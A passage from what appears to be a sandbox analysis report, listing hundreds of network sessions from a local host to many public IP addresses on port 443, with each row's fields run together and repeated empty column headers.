                                                        11695192.168.2.145604278.96.202.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11696192.168.2.1452454149.26.46.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11697192.168.2.1439150157.1.168.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11698192.168.2.1448000138.30.60.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11699192.168.2.1458120182.140.22.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11700192.168.2.1434720129.66.2.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11701192.168.2.143665277.96.157.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11702192.168.2.1454758220.123.61.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11703192.168.2.145352042.221.9.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11704192.168.2.1439206165.143.2.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11705192.168.2.144005085.132.201.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11706192.168.2.145991884.226.207.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11707192.168.2.144806095.147.94.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11708192.168.2.1437120210.118.74.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11709192.168.2.1435964213.32.103.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11710192.168.2.1435076172.35.131.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11711192.168.2.1434510104.175.146.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11712192.168.2.146058837.192.190.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11713192.168.2.1435546149.143.10.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11714192.168.2.1442202178.5.203.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11715192.168.2.1453962195.34.5.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11716192.168.2.144717264.69.193.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11717192.168.2.1453398157.22.56.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11718192.168.2.145235013.85.133.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11719192.168.2.1439156126.88.110.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11720192.168.2.145330468.157.253.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11721192.168.2.1433324220.203.10.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11722192.168.2.1459184175.135.106.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11723192.168.2.1451802144.1.221.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11724192.168.2.143519027.122.29.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11725192.168.2.145159252.113.243.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11726192.168.2.144394482.70.236.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11727192.168.2.143487487.29.30.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11728192.168.2.144983857.225.211.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11729192.168.2.1443814218.9.26.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11730192.168.2.1446770221.51.171.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11731192.168.2.1454968122.30.29.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11732192.168.2.145877435.0.9.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11733192.168.2.144309463.165.136.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11734192.168.2.144776292.9.170.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11735192.168.2.145350470.202.205.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11736192.168.2.1444574125.9.110.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11737192.168.2.1443456197.60.173.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11738192.168.2.143985890.164.250.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11739192.168.2.145133044.193.14.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11740192.168.2.143929250.192.241.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11741192.168.2.1444176139.130.222.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11742192.168.2.144936418.74.145.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11743192.168.2.1444326118.220.253.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11744192.168.2.146078837.167.62.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11745192.168.2.145091254.52.148.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11746192.168.2.145171818.140.212.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11747192.168.2.1445652212.26.123.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11748192.168.2.144927427.7.9.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11749192.168.2.143864298.242.233.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11750192.168.2.1447884169.42.179.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11751192.168.2.1438316118.51.152.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11752192.168.2.145483696.235.91.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11753192.168.2.143993813.96.110.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11754192.168.2.14365949.160.160.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11755192.168.2.145131625.124.107.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11756192.168.2.143638066.90.49.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11757192.168.2.1454614102.84.174.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11758192.168.2.1451876117.197.181.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11759192.168.2.145977635.12.108.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11760192.168.2.1451506134.179.11.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11761192.168.2.144979888.39.25.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11762192.168.2.1433782191.139.187.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11763192.168.2.1452848144.19.208.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11764192.168.2.1454556187.12.247.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11765192.168.2.1456642174.46.65.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11766192.168.2.1438460108.102.142.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11767192.168.2.1456024125.246.74.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11768192.168.2.144263685.173.17.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11769192.168.2.14490821.48.84.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11770192.168.2.1444530188.34.38.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11771192.168.2.1447216110.128.212.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11772192.168.2.1445168162.251.182.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11773192.168.2.143307259.166.47.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11774192.168.2.1437266100.146.108.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11775192.168.2.145436464.99.174.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11776192.168.2.145563647.16.192.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11777192.168.2.144020014.174.139.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11778192.168.2.1450830141.205.153.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11779192.168.2.144079093.162.183.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11780192.168.2.1445734145.133.19.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11781192.168.2.1453300173.235.3.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11782192.168.2.1453198120.86.165.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11783192.168.2.1441006114.118.71.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11784192.168.2.14432109.29.105.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11785192.168.2.144029274.78.131.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11786192.168.2.144705048.216.95.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11787192.168.2.143530047.169.251.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11788192.168.2.1453854186.185.82.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11789192.168.2.1438902202.194.68.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11790192.168.2.145670023.54.109.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11791192.168.2.1434050192.14.59.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11792192.168.2.1448596196.241.202.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11793192.168.2.145360824.29.25.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11794192.168.2.144301284.157.47.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11795192.168.2.143836014.104.63.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11796192.168.2.1434950166.135.234.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11797192.168.2.144385888.91.103.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11798192.168.2.1445330189.223.22.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11799192.168.2.143948670.253.43.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11800192.168.2.1433196135.112.145.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11801192.168.2.1442320175.11.12.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11802192.168.2.1443176134.113.230.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11803192.168.2.1460416182.244.109.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11804192.168.2.145903649.198.114.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11805192.168.2.1451354213.130.141.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11806192.168.2.1455138133.73.148.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11807192.168.2.1441918122.107.24.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11808192.168.2.1449012122.120.243.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11809192.168.2.1456076170.218.141.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11810192.168.2.143508894.111.139.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11811192.168.2.145557277.32.179.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11812192.168.2.144509444.207.236.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11813192.168.2.143503841.20.16.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11814192.168.2.1442000206.19.148.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11815192.168.2.145582060.81.13.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11816192.168.2.143319670.96.19.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11817192.168.2.1449822151.42.17.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11818192.168.2.1454398159.5.37.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11819192.168.2.1440148120.110.94.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11820192.168.2.1460386111.136.229.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11821192.168.2.143666814.18.111.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11822192.168.2.1450860170.35.189.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11823192.168.2.1450904150.131.88.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11824192.168.2.145355612.222.52.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11825192.168.2.143775467.185.122.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11826192.168.2.1450314107.21.56.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11827192.168.2.145314487.72.69.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11828192.168.2.1453168188.214.133.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11829192.168.2.1457338130.15.112.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11830192.168.2.1455790164.62.112.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11831192.168.2.143755277.77.191.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11832192.168.2.1442370198.231.125.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11833192.168.2.1439140145.184.161.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11834192.168.2.1457560171.49.186.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11835192.168.2.1458660202.251.216.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11836192.168.2.145126671.131.101.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11837192.168.2.1460642216.226.242.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11838192.168.2.1443222156.147.82.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11839192.168.2.1432980209.202.78.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11840192.168.2.145036078.141.180.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11841192.168.2.1438374123.118.237.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11842192.168.2.145426282.247.224.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11843192.168.2.1451450130.46.237.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11844192.168.2.1456790172.88.147.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11845192.168.2.1452272131.240.202.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11846192.168.2.145091840.186.138.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11847192.168.2.145475891.149.2.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11848192.168.2.146033478.106.252.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11849192.168.2.1446602208.93.233.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11850192.168.2.1436226166.30.69.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11851192.168.2.1457274167.20.1.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11852192.168.2.144631245.205.116.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11853192.168.2.145996276.170.194.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11854192.168.2.145625487.158.14.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11855192.168.2.143900457.226.178.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11856192.168.2.1459944158.94.186.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11857192.168.2.1455366148.211.13.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11858192.168.2.144059669.127.197.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11859192.168.2.145801045.182.250.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11860192.168.2.1441722128.47.207.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11861192.168.2.1445198160.104.220.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11862192.168.2.145281817.249.126.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11863192.168.2.1436424100.235.57.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11864192.168.2.145438851.72.83.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11865192.168.2.1437696196.33.206.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11866192.168.2.1443070106.84.247.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11867192.168.2.1438750171.22.113.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11868192.168.2.14553545.225.64.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11869192.168.2.1452640149.239.214.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11870192.168.2.1456306142.120.96.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11871192.168.2.145848835.105.37.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11872192.168.2.14577904.174.176.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11873192.168.2.1442666135.44.130.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11874192.168.2.1456758181.247.167.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11875192.168.2.145536499.41.252.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11876192.168.2.144634018.188.170.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11877192.168.2.144046269.178.8.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11878192.168.2.1434474142.27.35.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11879192.168.2.144997860.241.18.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11880192.168.2.1460112204.153.169.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11881192.168.2.1437998205.139.141.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11882192.168.2.1439346134.188.200.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11883192.168.2.1451548216.181.9.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11884192.168.2.1452446194.36.30.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11885192.168.2.1454144126.27.176.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11886192.168.2.143752082.40.224.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11887192.168.2.1440188171.44.137.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11888192.168.2.1457188119.184.112.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11889192.168.2.1438906220.191.195.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11890192.168.2.1432872120.135.28.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11891192.168.2.1457768145.20.55.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11892192.168.2.143909683.7.166.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11893192.168.2.1450422116.244.20.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11894192.168.2.144205472.89.234.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11895192.168.2.1458422104.111.227.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11896192.168.2.143342624.41.185.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11897192.168.2.145507876.62.43.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11898192.168.2.1453912202.67.168.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11899192.168.2.144089262.45.92.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11900192.168.2.1451058198.118.215.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11901192.168.2.1446136114.173.76.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11902192.168.2.145123043.8.100.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11903192.168.2.1459074170.157.220.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11904192.168.2.143476866.140.15.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11905192.168.2.1450726156.139.162.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11906192.168.2.1449188191.49.255.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11907192.168.2.1443232198.11.84.245443
